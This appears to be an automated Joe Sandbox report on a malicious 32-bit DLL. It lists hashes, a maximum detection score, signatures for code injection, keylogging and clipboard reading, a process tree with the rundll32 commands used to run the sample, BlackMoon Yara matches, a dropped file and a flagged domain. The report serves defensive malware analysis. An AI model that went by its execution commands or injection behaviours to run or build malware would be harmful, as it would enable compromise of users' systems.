Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5iiXyNVCQ3

Overview

General Information

Sample Name:5iiXyNVCQ3 (renamed file extension from none to dll)
Analysis ID:736960
MD5:73c06c75bd9aa0a194b0dc73ab38cac5
SHA1:7604d4be31e6c017e3bd9a1e5590a81a7aafb40f
SHA256:fde687287ef8cd7e6a6ce655355eaca2fba25fd6c22cc1e4040281f73205ba90
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Potential key logger detected (key state polling based)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3144 cmdline: loaddll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 400 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5996 cmdline: rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • svchost.exe (PID: 5972 cmdline: C:\WINDOWS\system32\svchost.exe -K NetworkService MD5: FA6C268A5B5BDA067A901764D203D433)
    • rundll32.exe (PID: 964 cmdline: rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unll MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • svchost.exe (PID: 5020 cmdline: C:\WINDOWS\system32\svchost.exe -K NetworkService MD5: FA6C268A5B5BDA067A901764D203D433)
      • WerFault.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 844 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • svchost.exe (PID: 3832 cmdline: C:\WINDOWS\system32\svchost.exe -K NetworkService MD5: FA6C268A5B5BDA067A901764D203D433)
    • WerFault.exe (PID: 5288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
3.0.rundll32.exe.475e2dd.4.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
4.2.rundll32.exe.1000e2dd.1.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
0.3.loaddll32.exe.280e2dd.0.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
0.0.loaddll32.exe.1000e2dd.2.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
0.2.loaddll32.exe.280e2dd.1.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
  • 0x5bd3b:$s1: blackmoon
  • 0x5bd7b:$s2: BlackMoon RunTime Error:
Click to see the 12 entries

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:192.168.2.48.8.8.856572532023883 11/03/22-12:35:13.698250
SID:2023883
Source Port:56572
Destination Port:53
Protocol:UDP
Classtype:Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 5iiXyNVCQ3.dllVirustotal: Detection: 92%Perma Link
Source: 5iiXyNVCQ3.dllReversingLabs: Detection: 95%
Source: 5iiXyNVCQ3.dllMetadefender: Detection: 80%Perma Link
Antivirus / Scanner detection for submitted sample
Source: 5iiXyNVCQ3.dllAvira: detected
Multi AV Scanner detection for domain / URL
Source: 52eva.topVirustotal: Detection: 6%Perma Link
Antivirus detection for dropped file
Source: C:\Program Files\WinRAP\RarExt32.dllAvira: detection malicious, Label: HEUR/AGEN.1238485
Multi AV Scanner detection for dropped file
Source: C:\Program Files\WinRAP\RarExt32.dllReversingLabs: Detection: 95%
Source: C:\Program Files\WinRAP\RarExt32.dllVirustotal: Detection: 92%Perma Link
Source: C:\Program Files\WinRAP\RarExt32.dllMetadefender: Detection: 80%Perma Link
Machine Learning detection for sample
Source: 5iiXyNVCQ3.dllJoe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Program Files\WinRAP\RarExt32.dllJoe Sandbox ML: detected
Source: 0.0.loaddll32.exe.bd4498.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.280e2dd.4.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.1000e2dd.2.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.475e2dd.1.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 7.3.svchost.exe.e56000.1.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 0.3.loaddll32.exe.280e2dd.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.1000e2dd.2.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 0.2.loaddll32.exe.280e2dd.1.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.475e2dd.4.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 4.2.rundll32.exe.1000e2dd.1.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.2.rundll32.exe.f1fe88.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.2.rundll32.exe.475e2dd.1.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.3.rundll32.exe.475e2dd.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 4.3.rundll32.exe.68ffa0.2.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 7.3.svchost.exe.eab008.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 4.3.rundll32.exe.aee2dd.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.1000e2dd.5.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.f1fe88.3.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.1000e2dd.5.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.0.rundll32.exe.f1fe88.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.bd4498.3.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 0.2.loaddll32.exe.1000e2dd.2.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 4.2.rundll32.exe.aee2dd.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 3.2.rundll32.exe.1000e2dd.2.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 0.0.loaddll32.exe.280e2dd.1.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 4.3.rundll32.exe.68ffa0.1.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 0.2.loaddll32.exe.bd4498.0.unpackAvira: Label: TR/Crypt.NSPM.Gen
Source: 5iiXyNVCQ3.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\WinRAPJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\WinRAP\RarExt32.dllJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00483CEE __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,7_2_00483CEE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041EED0 FindFirstFileA,FindClose,7_2_0041EED0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040F300 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA,7_2_0040F300
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417FF0 FindNextFileA,FindClose,FindFirstFileA,FindClose,7_2_00417FF0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_1000300A
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_1000300A
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_1000300A
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_10001027
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_10002D31
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_10002D31
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_10002D31
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-50h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10003356
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_100013D3
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_100013D3
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_100013D3
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_100013D3
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_10004606
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_10004610
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_1000461A
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_10004624
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_1000462E
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_1000283C
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_10005E5F
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_10005E5F
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_10005E5F
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_10006272
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_10006272
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_1000667B
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_1000667B
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_10008C8B
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_10008C8B
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_100068F2
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_10005F47
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_10005F47
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_10001F4E
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_1000676C
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_10005D6F
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_10005D6F
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10007779
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_10008779
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_10008779
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_10008779
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_10008779
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_10008779
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_10008779
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_10006984
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_10007FBF
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_100065CF
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_100061D0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_100061D0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10007FFC
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10007FFC
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10007FFC
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_10007FFC
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_100045FC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp3_2_1000300A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp3_2_1000300A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp3_2_1000300A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp3_2_10001027
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp3_2_10005E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp3_2_10005E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp3_2_10005E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp3_2_10002D31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp3_2_10002D31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp3_2_10002D31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-50h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp3_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp3_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp3_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp3_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp3_2_10004606
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp3_2_10004610
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp3_2_1000461A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp3_2_10004624
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp3_2_1000462E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp3_2_1000283C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp3_2_10006272
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp3_2_10006272
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp3_2_1000667B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp3_2_1000667B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp3_2_10008C8B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp3_2_10008C8B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp3_2_100068F2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp3_2_10005F47
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp3_2_10005F47
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp3_2_10001F4E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp3_2_1000676C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp3_2_10005D6F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp3_2_10005D6F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10007779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp3_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp3_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp3_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp3_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp3_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp3_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp3_2_10006984
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp3_2_10007FBF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp3_2_100065CF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp3_2_100061D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp3_2_100061D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10007FFC
